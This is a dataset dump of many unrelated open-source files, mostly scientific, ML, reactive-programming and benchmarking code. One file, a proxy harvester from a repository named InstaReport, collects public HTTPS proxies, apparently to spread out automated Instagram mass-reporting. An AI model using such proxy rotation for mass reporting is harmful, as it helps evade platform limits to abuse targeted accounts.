max_stars_repo_path (stringlengths 4-245) | max_stars_repo_name (stringlengths 7-115) | max_stars_count (int64 101-368k) | id (stringlengths 2-8) | content (stringlengths 6-1.03M) |
---|---|---|---|---|
Projects/Random_Quotes_Website/quotes/__init__.py | ieternalleo/AlgoCode | 151 | 12696767 | <gh_stars>100-1000
# This file may not be empty, so I can easily upload it to GitHub |
wavetorch/operators.py | Kshitiz-Bansal/wavetorch | 470 | 12696772 | <filename>wavetorch/operators.py
import torch
from torch.nn.functional import conv2d
def _laplacian(y, h):
"""Laplacian operator"""
operator = h ** (-2) * torch.tensor([[[[0.0, 1.0, 0.0], [1.0, -4.0, 1.0], [0.0, 1.0, 0.0]]]])
y = y.unsqueeze(1)
# y = pad(y,pad=(0,0,1,1), mode='circular')
# y = pad(y,pad=(1,1,0,0),mode='circular')
return conv2d(y, operator, padding=1).squeeze(1)
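
# A minimal usage sketch (assumption: illustration only, not part of wavetorch).
# _laplacian expects a batch of 2D fields of shape (N, H, W) plus the grid
# spacing h, and returns the 5-point discrete Laplacian of each field.
if __name__ == "__main__":
    y0 = torch.zeros(1, 8, 8)
    y0[0, 4, 4] = 1.0            # unit point source in the middle of the grid
    lap = _laplacian(y0, h=1.0)
    print(lap.shape)             # torch.Size([1, 8, 8])
    print(lap[0, 4, 4].item())   # -4.0 at the source, 1.0 at its four neighbours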
|
applications/DEMApplication/tests/test_DEM_3D_contact.py | lkusch/Kratos | 778 | 12696811 | <filename>applications/DEMApplication/tests/test_DEM_3D_contact.py<gh_stars>100-1000
import os
import KratosMultiphysics
from KratosMultiphysics import Logger
Logger.GetDefaultOutput().SetSeverity(Logger.Severity.WARNING)
import KratosMultiphysics.DEMApplication as DEM
import KratosMultiphysics.KratosUnittest as KratosUnittest
import KratosMultiphysics.DEMApplication.DEM_analysis_stage
import auxiliary_functions_for_tests
this_working_dir_backup = os.getcwd()
def GetFilePath(fileName):
return os.path.join(os.path.dirname(os.path.realpath(__file__)), fileName)
class DEM3D_ContactTestSolution(KratosMultiphysics.DEMApplication.DEM_analysis_stage.DEMAnalysisStage, KratosUnittest.TestCase):
@classmethod
def GetMainPath(self):
return os.path.join(os.path.dirname(os.path.realpath(__file__)), "DEM3D_contact_tests_files")
def GetProblemNameWithPath(self):
return os.path.join(self.main_path, self.DEM_parameters["problem_name"].GetString())
def FinalizeSolutionStep(self):
super().FinalizeSolutionStep()
tolerance = 1.001
for node in self.rigid_face_model_part.Nodes:
dem_pressure = node.GetSolutionStepValue(DEM.DEM_PRESSURE)
contact_force = node.GetSolutionStepValue(DEM.CONTACT_FORCES_Z)
if node.Id == 9:
if self.time > 0.35:
self.assertAlmostEqual(dem_pressure, 1621, delta=tolerance)
self.assertAlmostEqual(contact_force, -6484, delta=tolerance)
if node.Id == 13:
if self.time > 0.35:
self.assertAlmostEqual(dem_pressure, 841, delta=tolerance)
self.assertAlmostEqual(contact_force, -3366, delta=tolerance)
def Finalize(self):
self.procedures.RemoveFoldersWithResults(str(self.main_path), str(self.problem_name), '')
super().Finalize()
class TestDEM3DContact(KratosUnittest.TestCase):
def setUp(self):
pass
@classmethod
def test_DEM3D_contact(self):
path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "DEM3D_contact_tests_files")
parameters_file_name = os.path.join(path, "ProjectParametersDEM.json")
model = KratosMultiphysics.Model()
# Test parallel computation.
with open(parameters_file_name,'r') as parameter_file:
project_parameters = KratosMultiphysics.Parameters(parameter_file.read())
DEM3D_ContactTestSolution(model, project_parameters).Run()
if __name__ == "__main__":
Logger.GetDefaultOutput().SetSeverity(Logger.Severity.WARNING)
KratosUnittest.main()
|
rx/core/operators/flatmap.py | mmpio/RxPY | 4,342 | 12696840 | <reponame>mmpio/RxPY<gh_stars>1000+
import collections
from typing import Callable, Optional
from rx import from_, from_future, operators as ops
from rx.core import Observable
from rx.core.typing import Mapper, MapperIndexed
from rx.internal.utils import is_future
def _flat_map_internal(source, mapper=None, mapper_indexed=None):
def projection(x, i):
mapper_result = mapper(x) if mapper else mapper_indexed(x, i)
if is_future(mapper_result):
result = from_future(mapper_result)
elif isinstance(mapper_result, collections.abc.Iterable):
result = from_(mapper_result)
else:
result = mapper_result
return result
return source.pipe(
ops.map_indexed(projection),
ops.merge_all()
)
def _flat_map(mapper: Optional[Mapper] = None) -> Callable[[Observable], Observable]:
def flat_map(source: Observable) -> Observable:
"""One of the Following:
Projects each element of an observable sequence to an observable
sequence and merges the resulting observable sequences into one
observable sequence.
Example:
>>> flat_map(source)
Args:
source: Source observable to flat map.
Returns:
An operator function that takes a source observable and returns
an observable sequence whose elements are the result of invoking
the one-to-many transform function on each element of the
input sequence .
"""
if callable(mapper):
ret = _flat_map_internal(source, mapper=mapper)
else:
ret = _flat_map_internal(source, mapper=lambda _: mapper)
return ret
return flat_map
def _flat_map_indexed(mapper_indexed: Optional[MapperIndexed] = None) -> Callable[[Observable], Observable]:
def flat_map_indexed(source: Observable) -> Observable:
"""One of the Following:
Projects each element of an observable sequence to an observable
sequence and merges the resulting observable sequences into one
observable sequence.
Example:
>>> flat_map_indexed(source)
Args:
source: Source observable to flat map.
Returns:
An observable sequence whose elements are the result of invoking
the one-to-many transform function on each element of the input
sequence.
"""
if callable(mapper_indexed):
ret = _flat_map_internal(source, mapper_indexed=mapper_indexed)
else:
ret = _flat_map_internal(source, mapper=lambda _: mapper_indexed)
return ret
return flat_map_indexed
def _flat_map_latest(mapper: Mapper) -> Callable[[Observable], Observable]:
def flat_map_latest(source: Observable) -> Observable:
"""Projects each element of an observable sequence into a new
sequence of observable sequences by incorporating the element's
index and then transforms an observable sequence of observable
sequences into an observable sequence producing values only
from the most recent observable sequence.
Args:
source: Source observable to flat map latest.
Returns:
An observable sequence whose elements are the result of
invoking the transform function on each element of source
producing an observable of Observable sequences and that at
any point in time produces the elements of the most recent
inner observable sequence that has been received.
"""
return source.pipe(
ops.map(mapper),
ops.switch_latest()
)
return flat_map_latest
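
# A minimal usage sketch (assumption: illustration only, not part of this module).
# Application code reaches these internals through the public rx.operators API:
if __name__ == "__main__":
    import rx

    rx.of(1, 2, 3).pipe(
        ops.flat_map(lambda x: rx.of(x, x * 10))
    ).subscribe(print)  # with synchronous sources this prints 1, 10, 2, 20, 3, 30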
|
textclf/data/raw.py | lswjkllc/textclf | 146 | 12696845 | import os
from tabulate import tabulate
from textclf.data.dictionary import Dictionary, LabelDictionary
from textclf.config import PreprocessConfig
from textclf.utils.raw_data import (
tokenize_file,
create_tokenizer,
get_label_prob,
build_label2id
)
class TextClfRawData(object):
    """Preprocess the data: tokenize, build the dictionary, and save it in binary form for fast loading."""
    def __init__(self, config: PreprocessConfig):
        """
        :param config: preprocessing settings
:type config: PreprocessConfig
"""
self.config = config
self.tokenizer = create_tokenizer(config.tokenizer)
self.train_pairs = tokenize_file(
os.path.join(config.datadir, config.train_file),
self.tokenizer
)
self.valid_pairs = tokenize_file(
os.path.join(config.datadir, config.valid_file),
self.tokenizer
)
self.test_pairs = tokenize_file(
os.path.join(config.datadir, config.test_file),
self.tokenizer
)
self.dictionary = self._build_dictionary()
self.label2id = build_label2id([label for _, label in self.train_pairs])
def _build_dictionary(self):
dictionary = Dictionary()
for text, _ in self.train_pairs:
dictionary.add_sentence(text) # build dict
dictionary.finalize(
nwords=self.config.nwords,
threshold=self.config.min_word_count
)
return dictionary
    def describe(self):
        """Print information about the data: label distribution and dictionary size.
        """
headers = [
"",
self.config.train_file,
self.config.valid_file,
self.config.test_file
]
train_label_prob = get_label_prob([label for _, label in self.train_pairs])
valid_label_prob = get_label_prob([label for _, label in self.valid_pairs])
test_label_prob = get_label_prob([label for _, label in self.test_pairs])
label_table = []
for label in train_label_prob:
label_table.append([
label,
train_label_prob[label],
valid_label_prob[label],
test_label_prob[label]
])
label_table.append([
"Sum",
len(self.train_pairs),
len(self.valid_pairs),
len(self.test_pairs)
])
print("Label Prob:")
print(tabulate(label_table, headers, tablefmt="grid", floatfmt=".4f"))
print(f"Dictionary Size: {len(self.dictionary)}")
|
resources/enoki_gdb.py | njroussel/enoki | 115 | 12696873 | <gh_stars>100-1000
###############################################################################
# GDB Script to improve introspection of array types when debugging software
# using Enoki. Copy this file to "~/.gdb" (creating the directory, if not
# present) and then append the following line to the file "~/.gdbinit"
# (again, creating it, if not already present):
###############################################################################
# set print pretty
# source ~/.gdb/enoki_gdb.py
###############################################################################
import gdb
simple_types = {
'bool',
'char', 'unsigned char',
'short', 'unsigned short',
'int', 'unsigned int',
'long', 'unsigned long',
'long long', 'unsigned long long',
'float', 'double'
}
class EnokiIterator:
def __init__(self, instance, size):
self.instance = instance
self.size = size
self.index = 0
def __iter__(self):
return self
def __next__(self):
if self.index >= self.size:
raise StopIteration
result = ('[%i]' % self.index, self.instance[self.index])
self.index += 1
return result
def next(self):
return self.__next__()
class EnokiStaticArrayPrinter:
def __init__(self, instance):
self.instance = instance
itype = self.instance.type.strip_typedefs()
# Extract derived type
if 'StaticArrayImpl' in str(itype):
itype = itype.template_argument(3)
try:
data = self.instance['m_data']['_M_elems']
self.data_type = data.type.strip_typedefs().target()
except Exception:
self.data_type = itype.template_argument(0)
# Determine the size and data type
self.size = int(str(itype.template_argument(1)))
self.is_simple = str(self.data_type) in simple_types
self.type_size = self.data_type.sizeof
self.is_mask = 'Mask' in str(itype)
try:
_ = instance['k']
self.kmask = True
except Exception:
self.kmask = False
def entry(self, i):
if i < 0 or i >= self.size:
return None
addr = int(self.instance.address) + self.type_size * i
cmd = '*((%s *) 0x%x)' % (str(self.data_type), addr)
return str(gdb.parse_and_eval(cmd))
def children(self):
if self.is_simple:
return []
else:
return EnokiIterator(self.instance['m_data']['_M_elems'], self.size)
def to_string(self):
if self.is_simple:
if not self.is_mask:
result = [self.entry(i) for i in range(self.size)]
else:
if self.kmask:
# AVX512 mask register
result = list(reversed(format(int(self.instance['k']), '0%ib' % self.size)))
else:
result = [None] * self.size
for i in range(self.size):
value = self.entry(i)
result[i] = '0' if (value == '0' or value == 'false') else '1'
return '[' + ', '.join(result) + ']'
else:
return ''
class EnokiDynamicArrayPrinter:
def __init__(self, instance):
self.instance = instance
itype = self.instance.type.strip_typedefs()
self.size = int(str(self.instance['m_size']))
self.packet_count = int(str(self.instance['m_packets_allocated']))
self.packet_type = itype.template_argument(0)
self.packet_size = self.packet_type.sizeof
self.data = int(str(instance['m_packets']['_M_t']['_M_t']['_M_head_impl']), 0)
self.limit = 20
def to_string(self):
values = []
for i in range(self.packet_count):
addr = int(self.data) + self.packet_size * i
cmd = '*((%s *) 0x%x)' % (str(self.packet_type), addr)
value = str(gdb.parse_and_eval(cmd))
assert value[-1] == ']'
values += value[value.rfind('[')+1:-1].split(', ')
if len(values) > self.size:
values = values[0:self.size]
break
if len(values) > self.limit:
break
if len(values) > self.limit:
values = values[0:self.limit]
values.append(".. %i skipped .." % (self.size - self.limit))
return '[' + ', '.join(values) + ']'
# Static Enoki arrays
regexp_1 = r'(enoki::)?(Array|Packet|Complex|Matrix|' \
'Quaternion|StaticArrayImpl)(Mask)?<.+>'
# Mitsuba 2 is one of the main users of Enoki. For convenience, also
# declare its custom array types here
regexp_2 = r'(mitsuba::)?(Vector|Point|Normal|Spectrum|Color)<.+>'
regexp_combined = r'^(%s)|(%s)$' % (regexp_1, regexp_2)
p = gdb.printing.RegexpCollectionPrettyPrinter("enoki")
p.add_printer("static", regexp_combined, EnokiStaticArrayPrinter)
p.add_printer("dynamic", r'^(enoki::)?DynamicArray(Impl)?<.+>$', EnokiDynamicArrayPrinter)
o = gdb.current_objfile()
gdb.printing.register_pretty_printer(o, p)
|
market_maker/utils/errors.py | mwithi/sample-market-maker | 1,524 | 12696898 | <gh_stars>1000+
class AuthenticationError(Exception):
pass
class MarketClosedError(Exception):
pass
class MarketEmptyError(Exception):
pass
|
gdmix-trainer/src/gdmix/factory/driver_factory.py | Kostyansa/gdmix | 130 | 12696926 | import logging
from gdmix.drivers.fixed_effect_driver import FixedEffectDriver
from gdmix.drivers.random_effect_driver import RandomEffectDriver
from gdmix.factory.model_factory import ModelFactory
from gdmix.util import constants
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
class DriverFactory:
"""
Provider class for creating driver and dependencies
NOTE - for now, only Estimator-based linear models are supported. In the future, the factory will also
accept model type as an input parameter
"""
@staticmethod
def get_driver(base_training_params, raw_model_params):
"""
Create driver and associated dependencies, based on type. Only linear, estimator-based models supported
for now
        :param base_training_params: Parsed base training parameters common to all models. This could include the
        path to training data, validation data, metadata file path, learning rate etc.
        :param raw_model_params: Raw model parameters, representing model-specific requirements. For example, a
        CNN might expose filter_size as a parameter, and a text-based model might expose the size of its word
        embedding matrix as a parameter
:return: Fixed or Random effect driver
"""
driver = DriverFactory.drivers[base_training_params.stage]
model = ModelFactory.get_model(base_training_params, raw_model_params)
logger.info(f"Instantiating model {model} and driver {driver}")
return driver(base_training_params=base_training_params, model=model)
    drivers = {constants.FIXED_EFFECT: FixedEffectDriver, constants.RANDOM_EFFECT: RandomEffectDriver}
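
# A minimal sketch (assumption: illustration only) of how the stage constant
# selects the driver class via DriverFactory.drivers:
if __name__ == "__main__":
    print(DriverFactory.drivers[constants.FIXED_EFFECT].__name__)   # FixedEffectDriver
    print(DriverFactory.drivers[constants.RANDOM_EFFECT].__name__)  # RandomEffectDriver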
|
tensor2tensor/models/video/basic_recurrent.py | jaseweir/tensor2tensor | 12,921 | 12696955 | <reponame>jaseweir/tensor2tensor<gh_stars>1000+
# coding=utf-8
# Copyright 2021 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Basic recurrent models for testing simple tasks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensor2tensor.layers import common_video
from tensor2tensor.models.video import basic_stochastic
from tensor2tensor.utils import registry
@registry.register_model
class NextFrameBasicRecurrent(
basic_stochastic.NextFrameBasicStochasticDiscrete):
"""Basic next-frame recurrent model."""
@property
def is_recurrent_model(self):
return True
def middle_network(self, layer, internal_states):
lstm_func = common_video.conv_lstm_2d
hp = self.hparams
lstm_states = internal_states
if lstm_states is None:
lstm_states = [None] * hp.num_lstm_layers
# LSTM layers
x = layer
for j in range(hp.num_lstm_layers):
x, lstm_states[j] = lstm_func(x, lstm_states[j], hp.num_lstm_filters)
return x, lstm_states
@registry.register_hparams
def next_frame_basic_recurrent():
"""Basic 2-frame recurrent model with stochastic tower."""
hparams = basic_stochastic.next_frame_basic_stochastic_discrete()
hparams.filter_double_steps = 2
hparams.hidden_size = 64
hparams.video_num_input_frames = 4
hparams.video_num_target_frames = 4
hparams.concat_internal_states = False
hparams.add_hparam("num_lstm_layers", 2)
hparams.add_hparam("num_lstm_filters", 256)
return hparams
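
# A minimal sketch (assumption: illustration only) of retrieving the model class
# registered above and building its default hparams:
if __name__ == "__main__":
  model_cls = registry.model("next_frame_basic_recurrent")
  hparams = next_frame_basic_recurrent()
  print(model_cls.__name__, hparams.num_lstm_layers)  # NextFrameBasicRecurrent 2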
|
src/kubetop/_twistmain.py | TheoBrigitte/kubetop | 154 | 12696959 | <reponame>TheoBrigitte/kubetop<gh_stars>100-1000
# Copyright Least Authority Enterprises.
# See LICENSE for details.
"""
Adapter from IServiceMaker-like interface to setuptools console-entrypoint
interface.
Premise
=======
Given:
* twist is the focus of efforts to make a good client-oriented command-line
driver for Twisted-based applications.
* kubetop is a client-y, command-line, Twisted-based application.
* Accounting for custom scripts in setup.py with setuptools is a lot harder
than just using the ``console_script`` feature.
Therefore:
* Implement application code to the twist interface.
* Build a single utility for adapting that interface to the ``console_script``
interface.
Theory of Operation
===================
#. Applications provide ``Options`` and ``makeService``, the main pieces of
``IServiceMaker``.
#. We provide an object which can be called as a ``console_script``
entrypoint.
#. That object hooks ``Options`` and ``makeService`` up to the internals of
``twist`` (which are *totally* private, sigh).
"""
from sys import stdout, argv
from os.path import expanduser
import attr
from twisted.application.twist import _options
from twisted.application.twist._twist import Twist
@attr.s(frozen=True)
class MainService(object):
tapname = "kubetop"
description = "kubetop"
options = attr.ib()
makeService = attr.ib()
@attr.s
class TwistMain(object):
options = attr.ib()
make_service = attr.ib()
exit_status = 0
exit_message = None
def exit(self, reason=None):
if reason is not None:
self.exit_status = 1
self.exit_message = reason.getTraceback()
from twisted.internet import reactor
reactor.stop()
def __call__(self):
_options.getPlugins = lambda iface: [
MainService(self.options, self._make_service),
]
t = Twist()
log_flag = u"--log-file"
log_file = u"~/.kubetop.log"
app_name = u"kubetop"
if str is bytes:
# sys.argv must be bytes Python 2
log_flag = log_flag.encode("ascii")
log_file = log_file.encode("ascii")
app_name = app_name.encode("ascii")
t.main([
argv[0],
log_flag, expanduser(log_file),
app_name,
] + argv[1:])
if self.exit_message:
stdout.write(self.exit_message)
raise SystemExit(self.exit_status)
def _make_service(self, options):
return self.make_service(self, options)
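
# A minimal sketch (assumption: hypothetical Options/makeService used purely for
# illustration) of wiring an application to this adapter; the resulting "main"
# object is what a setuptools console_script entry point would reference.
if __name__ == "__main__":
    from twisted.python import usage
    from twisted.application import service

    class ExampleOptions(usage.Options):
        optParameters = [["interval", "i", 5, "Polling interval in seconds."]]

    def make_example_service(main, options):
        return service.Service()

    main = TwistMain(ExampleOptions, make_example_service)
    # Calling main() would parse sys.argv, start the reactor and run the service.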
|
h2o-py/tests/testdir_apis/Data_Manipulation/pyunit_h2oH2OFrame_max_mean_median_min_large.py | vishalbelsare/h2o-3 | 6,098 | 12696979 | <reponame>vishalbelsare/h2o-3
from __future__ import print_function
import sys
sys.path.insert(1,"../../../")
import h2o
from tests import pyunit_utils
from h2o.utils.typechecks import assert_is_type
from random import randrange
import numpy as np
from h2o.frame import H2OFrame
def h2o_H2OFrame_stats():
"""
Python API test: h2o.frame.H2OFrame.max(), h2o.frame.H2OFrame.mean(), h2o.frame.H2OFrame.median(),
h2o.frame.H2OFrame.min(),
"""
row_num = randrange(1,10)
col_num = randrange(1,10)
python_lists = np.random.randint(-5,5, (row_num, col_num))
h2oframe = h2o.H2OFrame(python_obj=python_lists)
assert abs(h2oframe.max()-np.ndarray.max(python_lists)) < 1e-12, "h2o.H2OFrame.max() command is not working."
assert abs(h2oframe.min()-np.ndarray.min(python_lists)) < 1e-12, "h2o.H2OFrame.min() command is not working."
h2oMean = h2oframe.mean(skipna=False, axis=0)
assert_is_type(h2oMean, H2OFrame)
numpmean = list(np.mean(python_lists, axis=0))
h2omean = h2oMean.as_data_frame(use_pandas=True, header=False)
assert pyunit_utils.equal_two_arrays(numpmean, h2omean.values.tolist()[0], 1e-12, 1e-6), "h2o.H2OFrame.mean() command is not working."
h2oMedian = h2oframe.median(na_rm=True)
assert_is_type(h2oMedian, list)
numpmedian = list(np.median(python_lists, axis=0))
assert pyunit_utils.equal_two_arrays(numpmedian, h2oMedian, 1e-12, 1e-6), "h2o.H2OFrame.median() command is not working."
pyunit_utils.standalone_test(h2o_H2OFrame_stats)
|
3]. Competitive Programming/03]. HackerRank/1]. Practice/10]. 30 Days of Code/Python/Day_08.py | Utqrsh04/The-Complete-FAANG-Preparation | 6,969 | 12696980 | # 9th Solutions
#--------------------------
n = int(input())
d = {}
for i in range(n):
x = input().split()
d[x[0]] = x[1]
while True:
try:
name = input()
if name in d:
print(name, '=', d[name], sep='')
else:
print('Not found')
except:
break
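
# Example session (assumption: illustrative values only):
#   input:  3
#           sam 99912222
#           tom 11122222
#           harry 12299933
#           sam
#           edward
#   output: sam=99912222
#           Not found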
|
srunner/scenariomanager/actorcontrols/basic_control.py | aleallievi/scenario_runner | 447 | 12697011 | #!/usr/bin/env python
# Copyright (c) 2020 Intel Corporation
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
"""
This module provides the base class for user-defined actor
controllers. All user-defined controls must be derived from
this class.
A user must not modify the module.
"""
class BasicControl(object):
"""
This class is the base class for user-defined actor controllers
All user-defined agents must be derived from this class.
Args:
actor (carla.Actor): Actor that should be controlled by the controller.
Attributes:
_actor (carla.Actor): Controlled actor.
Defaults to None.
        _target_speed (float): Longitudinal target speed of the controller.
Defaults to 0.
_init_speed (float): Initial longitudinal speed of the controller.
Defaults to 0.
_waypoints (list of carla.Transform): List of target waypoints the actor
should travel along. A waypoint here is of type carla.Transform!
Defaults to [].
_waypoints_updated (boolean):
Defaults to False.
_reached_goal (boolean):
Defaults to False.
"""
_actor = None
_waypoints = []
_waypoints_updated = False
_target_speed = 0
_reached_goal = False
_init_speed = False
def __init__(self, actor):
"""
Initialize the actor
"""
self._actor = actor
def update_target_speed(self, speed):
"""
Update the actor's target speed and set _init_speed to False.
Args:
speed (float): New target speed [m/s].
"""
self._target_speed = speed
self._init_speed = False
def update_waypoints(self, waypoints, start_time=None):
"""
Update the actor's waypoints
Args:
waypoints (List of carla.Transform): List of new waypoints.
"""
self._waypoints = waypoints
self._waypoints_updated = True
def set_init_speed(self):
"""
Set _init_speed to True
"""
self._init_speed = True
def check_reached_waypoint_goal(self):
"""
Check if the actor reached the end of the waypoint list
returns:
True if the end was reached, False otherwise.
"""
return self._reached_goal
def reset(self):
"""
Pure virtual function to reset the controller. This should be implemented
in the user-defined agent implementation.
"""
raise NotImplementedError(
"This function must be re-implemented by the user-defined actor control."
"If this error becomes visible the class hierarchy is somehow broken")
def run_step(self):
"""
Pure virtual function to run one step of the controllers's control loop.
This should be implemented in the user-defined agent implementation.
"""
raise NotImplementedError(
"This function must be re-implemented by the user-defined actor control."
"If this error becomes visible the class hierarchy is somehow broken")
|
libs/proxy_harvester.py | Mr-Anonymous002/InstaReport | 109 | 12697024 | #!/usr/bin/env python3
# coding=utf-8
import asyncio
from proxybroker import Broker
from requests import get
from libs.utils import print_success
from libs.utils import print_error
from libs.utils import ask_question
from libs.utils import print_status
async def show(proxies, proxy_list):
while (len(proxy_list) < 50):
proxy = await proxies.get()
if proxy is None: break
print_success("[" + str(len(proxy_list) + 1) + "/50]", "Proxy found:", proxy.as_json()["host"] + ":" + str(proxy.as_json()["port"]))
proxy_list.append(
proxy.as_json()["host"] + ":" + str(proxy.as_json()["port"])
)
pass
pass
def find_proxies():
proxy_list = []
proxies = asyncio.Queue()
broker = Broker(proxies)
tasks = asyncio.gather(
broker.find(
types=['HTTPS'], limit=50), show(proxies, proxy_list)
)
loop = asyncio.get_event_loop()
loop.run_until_complete(tasks)
if (len(proxy_list) % 5 != 0 and len(proxy_list) > 5):
proxy_list = proxy_list[:len(proxy_list) - (len(proxy_list) % 5)]
    return proxy_list
|
data/migrations/test/test_db_config.py | giuseppe/quay | 2,027 | 12697028 | import pytest
from mock import patch
from data.runmigration import run_alembic_migration
from alembic.script import ScriptDirectory
from test.fixtures import *
@pytest.mark.parametrize(
"db_uri, is_valid",
[
("postgresql://devtable:password@quay-postgres/registry_database", True),
("postgresql://devtable:password%25@quay-postgres/registry_database", False),
("postgresql://devtable:password%%25@quay-postgres/registry_database", True),
("postgresql://devtable@db:password@quay-postgres/registry_database", True),
],
)
def test_alembic_db_uri(db_uri, is_valid):
"""
Test if the given URI is escaped for string interpolation (Python's configparser).
"""
with patch("alembic.script.ScriptDirectory.run_env") as m:
if is_valid:
run_alembic_migration(db_uri)
else:
with pytest.raises(ValueError):
run_alembic_migration(db_uri)
|
src/python/responseTimeTests.py | neoremind/luceneutil | 164 | 12697030 | #!/usr/bin/env python
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import shutil
import time
import sys
import signal
import os
import subprocess
import sendTasks
import datetime
import traceback
import threading
import email.mime.text
import smtplib
def usage():
print
print 'Usage: python -u %s -config <config>.py [-smoke]' % sys.argv[0]
print
sys.exit(1)
SMOKE_TEST = '-smoke' in sys.argv
if '-help' in sys.argv:
usage()
try:
idx = sys.argv.index('-config')
except ValueError:
configFile = 'localconfig.py'
else:
configFile = sys.argv[idx+1]
exec(open(configFile).read())
LOGS_DIR = 'logs'
REMOTE_CLIENT = 'sendTasks.py'
SERVER_PORT = 7777
reSVNRev = re.compile(r'revision (.*?)\.')
class Tee(object):
def __init__(self, file, att):
self.file = file
self.att = att
self.orig = getattr(sys, att)
setattr(sys, att, self)
def __del__(self):
setattr(sys, self.att, self.orig)
def write(self, data):
self.file.write(data)
self.file.flush()
self.orig.write(data)
def captureEnv(logsDir):
print
print 'Started: %s' % datetime.datetime.now()
print 'Python version: %s' % sys.version
svnRev = os.popen('svnversion %s' % LUCENE_HOME).read().strip()
print 'Lucene svn rev is %s (%s)' % (svnRev, LUCENE_HOME)
if svnRev.endswith('M'):
if system('svn diff %s > %s/lucene.diffs 2>&1' % (LUCENE_HOME, logsDir)):
raise RuntimeError('svn diff failed')
os.chmod('%s/lucene.diffs' % logsDir, 0444)
luceneUtilDir = os.path.abspath(os.path.split(sys.argv[0])[0])
luceneUtilRev = os.popen('hg id %s' % luceneUtilDir).read().strip()
print 'Luceneutil hg rev is %s (%s)' % (luceneUtilRev, luceneUtilDir)
if luceneUtilRev.find('+') != -1:
if system('hg diff %s > %s/luceneutil.diffs 2>&1' % (luceneUtilDir, logsDir)):
raise RuntimeError('hg diff failed')
os.chmod('%s/luceneutil.diffs' % logsDir, 0444)
for fileName in ('responseTimeTests.py', TASKS_FILE, configFile):
shutil.copy('%s/%s' % (luceneUtilDir, fileName),
'%s/%s' % (logsDir, fileName))
os.chmod('%s/%s' % (logsDir, fileName), 0444)
for fileName in ('/sys/kernel/mm/transparent_hugepage/enabled',
'/sys/kernel/mm/redhat_transparent_hugepage/enabled'):
if os.path.exists(fileName):
s = open(fileName, 'rb').read().strip()
print 'Transparent huge pages @ %s: currently %s' % (fileName, s)
if not ENABLE_THP:
if s.find('[never]') == -1:
open(fileName, 'wb').write('never')
print ' now setting to [never]...'
else:
print ' already disabled'
else:
if s.find('[always]') == -1:
open(fileName, 'wb').write('always')
print ' now setting to [always]...'
else:
print ' already enabled'
def kill(name, p):
while True:
for l in os.popen('ps ww | grep %s | grep -v grep | grep -v /bin/sh' % name).readlines():
l2 = l.strip().split()
pid = int(l2[0])
print ' stop %s process %s: %s' % (name, pid, l.strip())
try:
os.kill(pid, signal.SIGKILL)
except OSError, e:
print ' OSError: %s' % str(e)
if p.poll() is not None:
print ' done killing "%s"' % name
return
time.sleep(2.0)
class TopThread(threading.Thread):
def __init__(self, logFileName):
threading.Thread.__init__(self)
self.logFileName = logFileName
self.stop = False
def run(self):
startTime = time.time()
f = open(self.logFileName, 'wb')
try:
while not self.stop:
# ps axuw | sed "1 d" | sort -n -r -k3 | head
# Run top every 3 sec:
for i in xrange(6):
if self.stop:
break
time.sleep(0.5)
f.write('\n\nTime %.1f s:\n' % (time.time() - startTime))
#p = os.popen('ps axuw | sed "1 d" | sort -n -r -k3')
sawHeader = False
p = os.popen('COLUMNS=10000 top -c -b -n1')
try:
keep = []
for l in p.readlines():
l = l.strip()
if l == '':
continue
if not sawHeader:
if l.find('PID') != -1:
sawHeader = True
tup = l.split()
cpuIDX = tup.index('%CPU')
memIDX = tup.index('%MEM')
keep.append(l)
continue
tup = l.split()
if float(tup[cpuIDX]) > 0 or float(tup[memIDX]) > 0.1:
keep.append(l)
f.write('\n'.join(keep))
finally:
p.close()
f.write('\n')
f.flush()
finally:
f.close()
def system(command):
#print ' run: %s' % command
p = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
output = p.communicate()[0].strip()
if len(output) > 0:
print ' %s' % output.replace('\n', '\n ')
return p.returncode
def runOne(startTime, desc, dirImpl, postingsFormat, targetQPS, pct=None):
if pct is not None:
details = ' autoPct=%s' % pct
else:
details = ''
print
print '%s: config=%s, dir=%s, postingsFormat=%s, QPS=%s %s' % \
(datetime.datetime.now(), desc, dirImpl, postingsFormat, targetQPS, details)
logsDir = '%s/%s.%s.%s.qps%s' % (LOGS_DIR, desc, dirImpl, postingsFormat, targetQPS)
if pct is not None:
logsDir += '.pct%s' % pct
if postingsFormat == 'Lucene41':
indexPath = LUCENE41_INDEX_PATH
else:
indexPath = DIRECT_INDEX_PATH
os.makedirs(logsDir)
finished = False
if desc.startswith('Zing'):
if DO_STOP_START_ZST:
while True:
if system('sudo service zing-memory start 2>&1'):
print 'Failed to start zing-memory... retry; java processes:'
system('ps axuw | grep java')
time.sleep(2.0)
else:
break
javaCommand = ZING_JVM
else:
if DO_STOP_START_ZST:
while True:
if system('sudo service zing-memory stop 2>&1'):
print 'Failed to stop zing-memory... retry; java processes:'
system('ps axuw | grep java')
time.sleep(2.0)
else:
break
javaCommand = ORACLE_JVM
command = []
w = command.append
w(javaCommand)
# w('-agentlib:yjpagent=sampling,disablej2ee,alloceach=10')
if desc.find('CMS') != -1:
w('-XX:+UseConcMarkSweepGC')
#w('-XX:PrintFLSStatistics=1')
if CMS_NEW_GEN_SIZE is not None:
w('-XX:NewSize=%s' % CMS_NEW_GEN_SIZE)
elif desc.find('G1') != -1:
w('-XX:+UnlockExperimentalVMOptions -XX:+UseG1GC')
if dirImpl == 'MMapDirectory' and postingsFormat == 'Lucene41':
w('-Xmx4g')
